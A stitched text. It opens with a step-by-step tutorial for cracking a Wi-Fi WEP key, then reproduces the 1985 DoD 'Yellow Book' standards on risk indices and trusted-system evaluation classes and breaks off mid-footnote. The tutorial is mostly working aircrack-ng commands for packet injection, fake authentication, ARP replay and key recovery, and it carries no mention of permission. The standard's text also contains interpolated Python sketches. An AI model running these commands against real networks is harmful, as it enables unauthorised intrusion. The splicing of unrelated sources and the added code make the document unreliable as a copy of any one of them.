Simple Wi-Fi WEP Crack


Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipment used

Wi-Fi adapter: Alfa AWUS036H (available on eBay & Amazon)
Software: BackTrack 4 (free download from http://www.backtrack-linux.org)

Step 1 – Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6
starts the wireless interface in monitor mode on channel 6

Step 2 – Test Wireless Device Packet Injection

aireplay-ng -9 -e infosec -a 00:1B:11:24:27:2E wlan1
-9 means injection test
-e infosec is the wireless network name
-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs

airodump-ng -c 6 --bssid 00:1B:11:24:27:2E -w output wlan1
-c 6 is the channel of the wireless network
--bssid 00:1B:11:24:27:2E is the access point MAC address
-w output is the prefix for the capture files containing the IVs

Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 is the reassociation timing in seconds
-e infosec is the wireless network name
-a 00:1B:11:24:27:2E is the access point MAC address
-h 00:c0:ca:27:e5:6a is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i wlan1 | grep -i -E "(RA:|Authentication|ssoc)"

You would then look for error messages.
If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets. Start another session and…
Run: "tcpdump -n -e -s0 -vvv -i wlan1"

Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: "tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth". You may need to tweak the phrase "DeAuth" to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-3 means ARP request replay mode
-b 00:1B:11:24:27:2E is the access point MAC address
-h 00:c0:ca:27:e5:6a is our card MAC address

Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap
-b 00:1B:11:24:27:2E is the access point MAC address
output*.cap selects all capture files created by airodump-ng
All done!

Guidance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in Specific Environments (June 25, 1985)

                                                    CSC-STD-003-85

                             COMPUTER SECURITY REQUIREMENTS

                   GUIDANCE FOR APPLYING THE DEPARTMENT OF DEFENSE
                     TRUSTED COMPUTER SYSTEM EVALUATION CRITERIA
                               IN SPECIFIC ENVIRONMENTS

Approved for public release;
 distribution unlimited.

      25 June 1985
					   Library No. S-226,727

                                          FOREWORD 

This publication, Computer Security Requirements--Guidance for Applying the
Department of Defense Trusted Computer System Evaluation Criteria in Specific
Environments, is being issued by the DoD Computer Security Center (DoDCSC)
under the authority of and in accordance with DoD Directive 5215.1, "Computer
Security Evaluation Center." It provides guidance for specifying computer
security requirements for the Department of Defense (DoD) by identifying the
minimum class of system required for a given risk index.  System classes are
those defined by CSC-STD-001-83, Department of Defense Trusted Computer System
Evaluation Criteria, 15 August 1983.  Risk index is defined as the disparity
between the minimum clearance or authorization of system users and the maximum
sensitivity of data processed by the system.  This guidance is intended to be
used in establishing minimum computer security requirements for the processing
and/or storage and retrieval of sensitive or classified information by the
Department of Defense whenever automatic data processing systems are employed.
Point of contact concerning this publication is the Office of Standards and
Products, Attention: Chief, Computer Security Standards.

                                         25 June 1985

Robert L. Brotzman
Director
DoD Computer Security Center


		              ACKNOWLEDGMENTS

Acknowledgment is given to the following for formulating the computer security
requirements and the supporting technical and procedural rationale behind
these requirements: Col Roger R.  Schell, formerly DoDCSC, George F.  Jelen,
formerly DoDCSC, Daniel J.  Edwards, Sheila L.  Brand, and Stephen F.
Barnett, DoDCSC.

Acknowledgment is also given to the following for giving generously of their
time and expertise in the review and critique of these computer security
requirements: CDR Robert Emery, OJCS, Dan Mechelke, 902nd MI Gp, Mary Taylor,
DAMI-CIC, Maj. Freeman, DAMI-CIC, Ralph Neeper, DAMI-CIC, Duane Fagg, NAVDAC,
H. O. Lubbes, NAVELEX, Sue Berg, OPNAV, Susan Tominack, NAVDAC, Lt. Linda
Fischer, OPNAV, Eugene Epperly, ODUSD(P), Maj. Grace Culver, USAF-SITT, Capt
Mike Weidner, ASPO, and James P. Anderson, James P. Anderson & Co.

And finally, special recognition is extended to H.  William Neugent and Ingrid
M.  Olson of the MITRE Corporation and to Alfred W.  Arsenault of the DoDCSC
for preparation of this document.


		             TABLE OF CONTENTS
                                                                       Page
FOREWORD..............................................................   i
ACKNOWLEDGMENTS.......................................................  ii
LIST OF TABLES........................................................  iv
1.0 INTRODUCTION......................................................   1
2.0 DEFINITIONS.......................................................   3
3.0 RISK INDEX COMPUTATION............................................   7
4.0 COMPUTER SECURITY REQUIREMENTS....................................  11
REFERENCES............................................................  13


		              LIST OF TABLES

TABLE  1: Rating Scale for Minimum User Clearance.....................   8
TABLE  2: Rating Scale for Maximum Data Sensitivity...................   9
TABLE  3: Computer Security Requirements..............................  12


 1.0 INTRODUCTION

This document establishes computer security requirements for
the Department of Defense (DoD) by identifying the minimum class of system
required for a given risk index.  The classes are those defined by
CSC-STD-001-83, Department of Defense Trusted Computer System Evaluation
Criteria (henceforth referred to as the Criteria).(1) A system's risk index is
defined as the disparity between the minimum clearance or authorization of
system users and the maximum sensitivity of data processed by the system. [1]

The recommendations in this document are those that the DoD Computer Security
Center (DoDCSC) believes to be the minimum adequate to provide an acceptable
level of security.  These recommendations are made in part due to the fact
that there is no comprehensive policy in effect today which covers this area
of computer security.  Where current policy does exist, however, this document
shall not be taken to supersede or override that policy, nor shall it be taken
to provide exemption from any policy covering areas of security not addressed
in this document.

Section 2 of this document provides definitions of terms used.  Risk index
computation is described in Section 3, while Section 4 presents the computer
security requirements.

----------------------------------
[1] Since a clearance implicitly encompasses lower clearance levels (e.g., a
Secret-cleared user has an implicit Confidential clearance), the phrase
"minimum clearance of the system users" is more accurately stated as "maximum
clearance of the least cleared system user." For simplicity, this document
uses the former phrase.


2.0 DEFINITIONS

Application
     Those portions of a system, including portions of the operating system,
     that are not responsible for enforcing the system's security policy.
Category
     A grouping of classified or unclassified but sensitive information to
     which an additional restrictive label is applied to signify that
     personnel are granted access to the information only if they have
     appropriate authorization (e.g., proprietary information (PROPIN),
     information that is Not Releasable to Foreign Nationals (NOFORN),
     compartmented information, information revealing sensitive intelligence
     sources and methods (WNINTEL)).

Closed security environment

     An environment in which both of the following conditions hold true:

     1.  Application developers (including maintainers) have sufficient
         clearances and authorizations to provide acceptable presumption that
         they have not introduced malicious logic.  Sufficient clearance is
         defined as follows: where the maximum classification of the data to
         be processed is Confidential or less, developers are cleared and
         authorized to the same level as the most sensitive data; where the
         maximum classification of the data to be processed is Secret or
         above, developers have at least a Secret clearance.

     2.  Configuration control provides sufficient assurance that
         applications are protected against the introduction of malicious
         logic prior to and during the operation of system applications.

Compartmented security mode

          The mode of operation which allows the system to process two or more
          types of compartmented information (information requiring a special
          authorization) or any one type of compartmented information with
          other than compartmented information.  In this mode, all system
          users need not be cleared for all types of compartmented information
          processed, but must be fully cleared for at least Top Secret
          information for unescorted access to the computer.

Configuration control

         Management of changes made to a system's hardware, software,
         firmware, and documentation throughout the development and
         operational life of the system.


Controlled security mode

         The mode of operation that is a type of multilevel security mode in
         which a more limited amount of trust is placed in the
         hardware/software requirement base of the system, with resultant
         restrictions on the classification levels and clearance levels that
         may be supported.

Dedicated security mode

         The mode of operation in which the system is specifically and
         exclusively dedicated to and controlled for the processing of one
         particular type or classification of information, either for
         full-time operation or for a specified period of time.

Environment

         The aggregate of external circumstances, conditions, and events that
         affect the development, operation, and maintenance of a system.

Malicious logic

          Hardware, software, or firmware that is intentionally included in a
          system for the purpose of causing loss or harm (e.g., Trojan
          horses).

Multilevel security mode

          The mode of operation which allows two or more classification
          levels of information to be processed simultaneously within the
          same system when some users are not cleared for all levels of
          information present.

Open security environment

     An environment in which either of the following conditions holds true:

     1. Application developers (including maintainers) do not have sufficient
        clearance (or authorization) to provide an acceptable presumption that
        they have not introduced malicious logic.  (See "Closed security
        environment" for definition of sufficient clearance.)

     2. Configuration control does not provide sufficient assurance that
        applications are protected against the introduction of malicious
        logic prior to and during the operation of system applications.

Risk index

     The disparity between the minimum clearance or authorization of system
     users and the maximum sensitivity (e.g., classification and categories)
     of data processed by a system.

Sensitive information

     Information that, as determined by a competent authority, must be
     protected because its unauthorized disclosure, alteration, loss, or
     destruction will at least cause perceivable damage to someone or
     something.

System

     An assembly of computer hardware, software, and firmware configured for
     the purpose of classifying, sorting, calculating, computing, summarizing,
     transmitting and receiving, storing, and retrieving data with a minimum
     of human intervention.

System high security mode

     The mode of operation in which system hardware/software is only trusted
     to provide need-to-know protection between users.  In this mode, the
     entire system, to include all components electrically and/or physically
     connected, must operate with security measures commensurate with the
     highest classification and sensitivity of the information being processed
     and/or stored.  All system users in this environment must possess
     clearances and authorizations for all information contained in the
     system.  All system output must be clearly marked with the highest
     classification and all system caveats, until the information has been
     reviewed manually by an authorized individual to ensure appropriate
     classifications and caveats have been affixed.  

System users

     Those individuals with direct connections to the system, and also those
     individuals without direct connections who receive output or generate
     input that is not reliably reviewed for classification by a responsible
     individual.  The clearance of system users is used in the calculation of
     risk index.  

For additional definitions, refer to the Glossary of the Criteria.(1)


3.0 RISK INDEX COMPUTATION

The initial step in determining the minimum evaluation class required for a
system is to determine the system's risk index.  The risk index for a system
depends on the rating associated with the system's minimum user clearance
(Rmin) taken from Table 1 and the rating associated with the system's maximum
data sensitivity (Rmax) taken from Table 2.  The risk index is computed as
follows:

     Case a.  If Rmin is less than Rmax, then the risk index is determined by
subtracting Rmin from Rmax.[1]

                           Risk Index =  Rmax - Rmin

     Case b.  If Rmin is greater than or equal to Rmax, then

                      / 1, if there are categories on the system to which
                      |    some users are not authorized access
     Risk Index =    <
                      \ 0, otherwise

[1] There is one anomalous value that results because there are two "types" of
Top Secret clearance and only one "type" of Top Secret data.  When the minimum
user clearance is TS/BI and the maximum data sensitivity is Top Secret without
categories, then the risk index is 0 (rather than the value 1 which would
result from a straight application of the formula).


                                   TABLE 1

                 RATING SCALE FOR MINIMUM USER CLEARANCE [1].

                                                              RATING
                                                               (Rmin)

  Uncleared (U)                                                  0
  Not Cleared but Authorized Access to Sensitive Unclassified    1
  Information (N)
  Confidential (C)                                               2
  Secret (S)                                                     3
  Top Secret (TS)/Current Background Investigation (BI)          4
  Top Secret (TS)/current Special Background Investigation (SBI) 5
  One Category (1C)                                              6
  Multiple Categories (MC)                                       7

---------------------------------------
[1] The following clearances are as defined in DIS Manual 20-1(2):
Confidential, Secret, Top Secret/Current Background Investigation, Top
Secret/Current Special Background Investigation.


                                   TABLE 2

                 RATING SCALE FOR MAXIMUM DATA SENSITIVITY

    MAXIMUM DATA SENSITIVITY  RATING   MAXIMUM DATA SENSITIVITY        RATING
      WITHOUT CATEGORIES      (Rmax)        WITH CATEGORIES [1]      (Rmax) [2]

    Unclassified (U)            0      Not Applicable [3]

    Not Classified but          1      N With One or More Categories      2
      Sensitive [4]

    Confidential (C)            2      C With One or More Categories      3

    Secret (S)                  3      S With One or More Categories      4
                                         With No More Than One Category
                                         Containing Secret Data
                                       S With Two or More Categories      5
                                         Containing Secret Data

    Top Secret (TS)           5 [5]    TS With One or More Categories     6
                                         With No More Than One Category
                                         Containing Secret or Top
                                         Secret Data
                                       TS With Two or More Categories     7
                                         Containing Secret or Top
                                         Secret Data

-------------------------------

[1] The only categories of concern are those for which some users are not
authorized access.  When counting the number of categories, count all
categories regardless of the sensitivity level associated with the data.  If a
category is associated with more than one sensitivity level, it is only
counted at the highest level.

[2] Where the number of categories is large or where a highly sensitive
category is involved, a higher rating might be warranted.

[3] Since categories are sensitive and unclassified data is not, unclassified
data by definition cannot contain categories.

[4] Examples of N data include financial, proprietary, privacy, and mission
sensitive data.  In some situations (e.g., those involving extremely large
financial sums or critical mission sensitive data), a higher rating may be
warranted.  The table prescribes minimum ratings.

[5] The rating increment between the Secret and Top Secret data sensitivity
levels is greater than the increment between other adjacent levels.  This
difference derives from the fact that the loss of Top Secret data causes
exceptionally grave damage to the national security, whereas the loss of
Secret data causes only serious damage.
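To make the computation in Section 3 concrete, here is a minimal Python sketch (not part of the standard; the function name and keyword flags are hypothetical). It encodes the rating scales of Tables 1 and 2 and applies Cases a and b, including the TS/BI anomaly noted in the footnote:

```python
# Table 1: rating scale for minimum user clearance (Rmin)
R_MIN = {"U": 0, "N": 1, "C": 2, "S": 3, "TS/BI": 4, "TS/SBI": 5,
         "1C": 6, "MC": 7}

# Table 2: rating scale for maximum data sensitivity without categories (Rmax)
R_MAX = {"U": 0, "N": 1, "C": 2, "S": 3, "TS": 5}

def risk_index(r_min, r_max, uncleared_categories=False,
               ts_bi_vs_plain_ts=False):
    """Risk index per Cases a and b of Section 3 (hypothetical helper)."""
    if ts_bi_vs_plain_ts:
        # Footnote anomaly: TS/BI users against Top Secret data without
        # categories yields 0, not the 1 the formula would give.
        return 0
    if r_min < r_max:                        # Case a: Rmax - Rmin
        return r_max - r_min
    # Case b: Rmin >= Rmax; 1 only if some users lack category access
    return 1 if uncleared_categories else 0

# Example: Secret-cleared users (Rmin = 3) on a Top Secret system (Rmax = 5)
print(risk_index(R_MIN["S"], R_MAX["TS"]))   # -> 2
```

A risk index of 2 would then be carried into Table 3 to find the minimum evaluation class.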


4.0 COMPUTER SECURITY REQUIREMENTS

Table 3 identifies the minimum evaluation class appropriate for systems based
on the risk index computed in Section 3.  The classes identified are those
from The Criteria.(1) A risk index of 0 encompasses those systems operating in
either system high or dedicated security mode.  Risk indices of 1 through 7
encompass those systems operating in multilevel, controlled, compartmented, or
the Navy's limited access security mode; that is, those systems in which not
all users are fully cleared or authorized access to all sensitive or
classified data being processed and/or stored in the system.  In situations
where the local environment indicates that additional risk factors are
present, a system of a higher evaluation class may be required.


                                  TABLE 3

                       COMPUTER SECURITY REQUIREMENTS

                                             MINIMUM            MINIMUM
 RISK INDEX   SECURITY OPERATING MODE     CRITERIA CLASS     CRITERIA CLASS
                                             FOR OPEN          FOR CLOSED
                                         ENVIRONMENTS [4]   ENVIRONMENTS [4]

     0        Dedicated                   No Prescribed      No Prescribed
                                            Minimum [1]        Minimum [1]

     0        System High                    C2 [2]             C2 [2]

     1        Limited Access, Controlled,    B1 [3]             B1 [3]
              Compartmented, Multilevel

     2        Limited Access, Controlled,    B2                 B2
              Compartmented, Multilevel

     3        Controlled, Multilevel         B3                 B2

     4        Multilevel                     A1                 B3

     5        Multilevel                     *                  *

     6        Multilevel                     *                  *

     7        Multilevel                     *                  *

--------------------

[1] Although there is no prescribed minimum class, the integrity and denial of
service requirements of many systems warrant at least class C1 protection.

[2] If the system processes sensitive or classified data, at least a class C2
system is required.  If the system does not process sensitive or classified
data, a class C1 system is sufficient.

[3] Where a system processes classified or compartmented data and some users
do not have at least a Confidential clearance, or when there are more than two
types of compartmented information being processed, at least a class B2 system
is required.

[4] The asterisk (*) indicates that computer protection for environments with
that risk index is considered to be beyond the state of current computer
security technology.  Such environments must augment technical protection with
physical, personnel, and/or administrative security solutions.
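Table 3 can also be read as a simple lookup. The Python sketch below (a hypothetical helper, not part of the standard) encodes it, treating a risk index of 0 as distinguished only by dedicated versus system high mode:

```python
# Table 3 as a lookup (hypothetical helper, not part of the standard).
# None means no prescribed minimum class; "*" means protection is beyond
# current computer security technology, so physical, personnel, and/or
# administrative controls must augment the technical protection.

TABLE_3 = {  # risk index: (open environment, closed environment)
    1: ("B1", "B1"),
    2: ("B2", "B2"),
    3: ("B3", "B2"),
    4: ("A1", "B3"),
    5: ("*", "*"),
    6: ("*", "*"),
    7: ("*", "*"),
}

def minimum_class(risk_index, environment="open", mode="multilevel"):
    """Minimum evaluation class per Table 3."""
    if risk_index == 0:
        # Dedicated mode has no prescribed minimum; system high needs C2.
        return None if mode == "dedicated" else "C2"
    return TABLE_3[risk_index][0 if environment == "open" else 1]

print(minimum_class(3, environment="closed"))   # -> B2
```

Note how the open and closed columns diverge only at risk indices 3 and 4, reflecting the added assurance a closed environment provides.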


                      REFERENCES

1.   DoD Computer Security Center, DoD Trusted Computer System Evaluation
     Criteria, CSC-STD-001-83, 15 August 1983.  

2.  Defense Investigative Service (DIS) Manual 20-1, Manual for Personnel
    Investigations, 30 January 1981.

The Yellow Book: Guidance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in Specific Environments (June 1985)

 
                                                 CSC-STD-004-85

               TECHNICAL RATIONALE BEHIND CSC-STD-003-85:
                   COMPUTER SECURITY REQUIREMENTS

              GUIDANCE FOR APPLYING THE DEPARTMENT OF DEFENSE
                TRUSTED COMPUTER SYSTEM EVALUATION CRITERIA
                         IN SPECIFIC ENVIRONMENTS

              Approved for public release;
              distribution unlimited.

              25 June 1985

                                        Library No. S-226,728

                        FOREWORD

This publication, Technical Rationale Behind CSC-STD-003-85: Computer Security
Requirements--Guidance for Applying the Department of Defense Trusted Computer
System Evaluation Criteria in Specific Environments, is being issued by the DoD
Computer Security Center (DoDCSC) under the authority of and in accordance with
DoD Directive 5215.1, "Computer Security Evaluation Center." This document
presents background discussion and rationale for CSC-STD-003-85, Computer
Security Requirements--Guidance for Applying the Department of Defense Trusted
Computer System Evaluation Criteria in Specific Environments. The computer
security requirements identify the minimum class of system required for a given
risk index. System classes are those defined by CSC-STD-001-83, Department of
Defense Trusted Computer System Evaluation Criteria, 15 August 1983. Risk index
is defined as the disparity between the minimum clearance or authorization of
system users and the maximum sensitivity of data processed by the system. This
guidance is intended to be used in establishing minimum computer security
requirements for the processing and/or storage and retrieval of sensitive or
classified information by the Department of Defense whenever automatic data
processing systems are employed. Point of contact concerning this publication is
the Office of Standards and Products, Attention: Chief, Computer Security
Standards.

                                 25 June 1985
Robert L. Brotzman
Director
DoD Computer Security Center

                ACKNOWLEDGMENTS

Special recognition is extended to H.  William Neugent and Ingrid M.  Olson of
the MITRE Corporation for performing in-depth analysis of DoD policies and
procedures and for preparation of this document.

Acknowledgment is given to the following for formulating the computer security
requirements and the supporting technical and procedural rationale behind these
requirements: Col Roger R. Schell, formerly DoDCSC, George F. Jelen, formerly
DoDCSC, Daniel J. Edwards, Sheila L. Brand, and Stephen F. Barnett, DoDCSC.

Acknowledgment is also given to the following for giving generously of their
time and expertise in the review and critique of this document: CDR Robert
Emery, OJCS, Dan Mechelke, 902nd MI Gp, Mary Taylor, DAMI-CIC, Maj. Freeman,
DAMI-CIC, Ralph Neeper, DAMI-CIC, Duane Fagg, NAVDAC, H. O. Lubbes, NAVELEX,
Sue Berg, OPNAV, Susan Tominack, NAVDAC, Lt Linda Fischer, OPNAV, Eugene
Epperly, ODUSD(P), Maj Grace Culver, USAF-SITT, Capt Mike Weidner, ASPO, Alfred
W.  Arsenault, DoDCSC, James P.  Anderson, James P.  Anderson & Co., and Dr.
John Vasak, MITRE Corporation.


               TABLE OF CONTENTS
FOREWORD.............................................................   i
ACKNOWLEDGMENTS......................................................  ii
LIST OF TABLES.......................................................  iv
1.0 INTRODUCTION.....................................................   1
2.0 RISK INDEX.......................................................   5
3.0 COMPUTER SECURITY REQUIREMENTS FOR OPEN
    SECURITY ENVIRONMENTS............................................   11
4.0 COMPUTER SECURITY REQUIREMENTS FOR CLOSED
    SECURITY ENVIRONMENTS............................................   19
APPENDIX A: SUMMARY OF CRITERIA......................................   23
APPENDIX B: DETAILED DESCRIPTION OF CLEARANCES
     AND DATA SENSITIVITIES..........................................   27
APPENDIX C: ENVIRONMENTAL TYPES......................................   31
GLOSSARY.............................................................   33
ACRONYMS.............................................................   37
REFERENCES...........................................................   39


                 LIST OF TABLES
Table
1: Rating Scale for Minimum User Clearance.........................    6
2: Rating Scale for Maximum Data Sensitivity.......................    7
3: Security Risk Index Matrix......................................    8
4: Computer Security Requirements for Open Security Environments...   12
5: Security Index Matrix for Open Security Environments............   13
6: Computer Security Requirements for Closed Security Environments.   20
7: Security Index Matrix for Closed Security Environments..........   21


 1.0 INTRODUCTION
The purpose of this technical report is to present background discussion and
rationale for Computer Security Requirements--Guidance for Applying the DoD
Trusted Computer System Evaluation Criteria in Specific Environments(1)
(henceforth referred to as the Computer Security Requirements).  The
requirements were prepared in compliance with responsibilities assigned to the
Department of Defense (DoD) Computer Security Center (DoDCSC) under DoD
Directive 5215.1, which tasks the DoDCSC to "establish and maintain technical
standards and criteria for the evaluation of trusted computer systems."(2)

DoD computer systems have stringent requirements for security. In the past,
these requirements have been satisfied primarily through physical, personnel,
and information security safeguards.(3) Recent advances in technology make it
possible to place increasing trust in the computer system itself, thereby
increasing security effectiveness and efficiency. In turn, the need has arisen
for guidance on how this new technology should be used. There are two facets to
this required guidance:

     a.  Establishment of a metric for categorizing systems according to the
         security protection they provide.

     b.  Identification of the minimum security protection required in
         different environments.

The DoD Trusted Computer System Evaluation Criteria (henceforth referred to
as the Criteria), developed by the DoDCSC, satisfy the first of these two
requirements by categorizing computer systems into hierarchical security
classes.(4) The Computer Security Requirements satisfy the second requirement
by identifying the minimum classes appropriate for systems in different risk
environments. They are to be used by system managers in applying the Criteria
and thereby in selecting and specifying systems that have sufficient security
protection for specific operational environments.

Section 2 of this document discusses the risk index.  Section 3 presents a
discussion of the Computer Security Requirements for open security
environments.  Section 4 presents a discussion of the Computer Security
Requirements for closed security environments. A summary of the Criteria is
contained in Appendix A.  Appendix B contains a detailed description of
clearances and data sensitivities, and Appendix C describes the environmental
types.  A glossary provides definitions of many of the terms used in this
document.

1.1 Scope and Applicability

This section describes the scope and applicability for both this report and the
Computer Security Requirements. The primary focus of both documents is on the
technical aspects (e.g., hardware, software, configuration control) of computer
security, although the two documents also address the relationship between
computer security and physical, personnel, and information security.  While

communications and emanations security are important elements of system
security, they are outside the scope of the two documents.

Both documents apply to DoD computer systems that are entrusted with the
protection of information, regardless of whether or not that information is
classified, sensitive, national security-related, or any combination thereof.
Furthermore, both documents can be applied throughout the DoD.(5,6,7,8,9)

The two documents are concerned with protection against both disclosure and
integrity violations. Integrity violations are of particular concern for
sensitive unclassified information (e.g., financial data) as well as for some
classified applications (e.g., missile guidance data).

The recommendations of both this report and the Computer Security
Requirements are stated in terms of classes from the Criteria. Embodied in each
class and therefore encompassed within the scope of both documents are two
types of requirements:  assurance and feature requirements.  Assurance
requirements are those that contribute to confidence that the required features
are present and that the system is functioning as intended.  Examples of
assurance requirements include modular design, penetration testing, formal
verification, and trusted configuration management.  Feature requirements
encompass capabilities such as labeling, authentication, and auditing.

1.2 Security Operating Modes

DoD computer security policy identifies several security operating modes, for
which the following definitions are adapted:(10,11,12,13)

     a.  Dedicated Security Mode--The mode of operation in which the system is
         specifically and exclusively dedicated to and controlled for the
         processing of one particular type or classification of information,
         either for fulltime operation or for a specified period of time.

     b.  System High Security Mode--The mode of operation in which system
         hardware/software is only trusted to provide need-to-know protection
         between users.  In this mode, the entire system, to include all
         components electrically and/or physically connected, must operate with
         security measures commensurate with the highest classification and
         sensitivity of the information being processed and/or stored.  All
         system users in this environment must possess clearances and
         authorizations for all information contained in the system, and all
         system output must be clearly marked with the highest classification
         and all system caveats, until the information has been reviewed
         manually by an authorized individual to ensure appropriate
         classifications and caveats have been affixed.

     c.  Multilevel Security Mode--The mode of operation which allows two or
         more classification levels of information to be processed
         simultaneously within the same system when some users are not cleared
         for all levels of information present.

     d.  Controlled Mode--The mode of operation that is a type of multilevel
         security in which a more limited amount of trust is placed in the
         hardware/software base of the system, with resultant restrictions on
         the classification levels and clearance levels that may be supported.

     e.  Compartmented Security Mode--The mode of operation which allows
         the system to process two or more types of compartmented information
         (information requiring a special authorization) or any one type of
         compartmented information with other than compartmented information.
         In this mode, system access is secured to at least the Top Secret (TS)
         level, but all system users need not necessarily be formally
         authorized access to all types of compartmented information being
         processed and/or stored in the system.

In addition to these security operating modes, Service policies may define
other modes of operation.  For example, Office of the Chief of Naval Operations
(OPNAV) Instruction 5239.1A defines Limited Access Mode for those systems in
which the minimum user clearance is uncleared and the maximum data sensitivity
is not classified but sensitive.(6)


2.0 RISK INDEX

The evaluation class appropriate for a system is dependent on the level of
security risk inherent to that system.  This inherent risk is referred to as
that system's risk index.  Risk index is defined as follows:

     The disparity between the minimum clearance or authorization of system
     users and the maximum sensitivity of data processed by a system.

The Computer Security Requirements are based upon this risk index.  Although
there are other factors that can influence security risk, such as mission
criticality, required denial of service protection, and threat severity, only
the risk index is used to determine the minimum class of trusted systems to be
employed, since it can be uniformly applied in the determination of security
risk.  The risk index for a system depends on the rating associated with the
system's minimum user clearance (Rmin), taken from Table 1, and the rating
associated with the system's maximum data sensitivity (Rmax), taken from Table
2.  The risk index is computed as follows:

Case a. If Rmin is less than Rmax, then the risk index is determined by
subtracting Rmin from Rmax.(2)

                        Risk Index = Rmax - Rmin

Case b. If Rmin is greater than or equal to Rmax, then

     Risk Index = 1, if there are categories on the system to which some
                     users are not authorized access;
                  0, otherwise (i.e., if there are no categories on the
                     system or if all users are authorized access to all
                     categories).

     Example: For a system with a minimum user clearance of Confidential and a
     maximum data sensitivity of Secret (without categories), Rmin = 2 and
     Rmax = 3, giving a risk index of 1.

1 Since a clearance implicitly encompasses lower clearance levels (e.g., a
Secret-cleared user has an implicit Confidential clearance), the phrase
"minimum clearance...of system users" is more accurately stated as "maximum
clearance of the least cleared system user." For simplicity, this document uses
the former phrase.

2 There is one anomalous case in which this formula gives an incorrect result.
This is the case where the minimum clearance is Top Secret/Background
Investigation and the maximum data sensitivity is Top Secret. According to the
formula, this gives a risk index of 1. In actuality, the risk index in this
case is zero. The anomaly results because there are two "levels" of Top Secret
clearance and only one level of Top Secret data.
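The two cases above reduce to a few lines of arithmetic. A minimal sketch, with
ratings drawn from Tables 1 and 2 (the function and dictionary names are
illustrative, and the anomalous case of footnote 2 is not special-cased here):

```python
# Risk index computation from Section 2 (illustrative sketch).

CLEARANCE_RATING = {  # Table 1: minimum user clearance -> Rmin
    "U": 0, "N": 1, "C": 2, "S": 3,
    "TS(BI)": 4, "TS(SBI)": 5, "1C": 6, "MC": 7,
}
SENSITIVITY_RATING = {  # Table 2: maximum data sensitivity, no categories -> Rmax
    "U": 0, "N": 1, "C": 2, "S": 3, "TS": 5,
}

def risk_index(r_min, r_max, unauthorized_categories=False):
    # Case a: Rmin < Rmax  ->  Risk Index = Rmax - Rmin
    if r_min < r_max:
        return r_max - r_min
    # Case b: Rmin >= Rmax -> 1 if some users are not authorized access to
    # some category on the system, 0 otherwise.
    return 1 if unauthorized_categories else 0

# Worked example from the text: Confidential users, Secret data, no categories.
print(risk_index(CLEARANCE_RATING["C"], SENSITIVITY_RATING["S"]))  # 1
```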


                        TABLE 1

        RATING SCALE FOR MINIMUM USER CLEARANCE(1)

             MINIMUM USER CLEARANCE                                RATING

                      Uncleared (U)                                  0
   Not Cleared but Authorized Access to Sensitive Unclassified       1
                     Information (N)
                     Confidential (C)                                2
                        Secret (S)                                   3
     Top Secret (TS)/Current Background Investigation (BI)           4
 Top Secret (TS)/Current Special Background Investigation (SBI)      5
                One Category (1C)                                    6
              Multiple Categories (MC)                               7

1 See Appendix B for a detailed description of the terms listed.


                       TABLE 2

      RATING SCALE FOR MAXIMUM DATA SENSITIVITY

 MAXIMUM DATA SENSITIVITY  RATING   MAXIMUM DATA SENSITIVITY           RATING
   WITHOUT CATEGORIES      (Rmax)   WITH CATEGORIES(1)                 (Rmax)(2)

 Unclassified (U)            0      Not Applicable(3)
 Not Classified but          1      N With One or More Categories         2
   Sensitive (N)(4)
 Confidential (C)            2      C With One or More Categories         3
 Secret (S)                  3      S With One or More Categories,        4
                                      With No More Than One Category
                                      Containing Secret Data
                                    S With Two or More Categories         5
                                      Containing Secret Data
 Top Secret (TS)             5(5)   TS With One or More Categories,       6
                                      With No More Than One Category
                                      Containing Secret or Top Secret
                                      Data
                                    TS With Two or More Categories        7
                                      Containing Secret or Top Secret
                                      Data

1 The only categories of concern are those for which some users are not
authorized access to the category.  When counting the number of categories,
count all categories regardless of the sensitivity level associated with the
data.  If a category is associated with more than one sensitivity level, it is
only counted at the highest level.

2 Where the number of categories is large or where a highly sensitive category
is involved, a higher rating might be warranted.

3 Since categories imply sensitivity of data and unclassified data is not
sensitive, unclassified data by definition cannot contain categories.

4 N data includes financial, proprietary, privacy, and mission sensitive data.
Some situations (e.g., those involving extremely large financial sums or
critical mission sensitive data) may warrant a higher rating.  The table
prescribes minimum ratings.

5 The rating increment between the Secret and Top Secret data sensitivity
levels is greater than the increment between other adjacent levels.  This
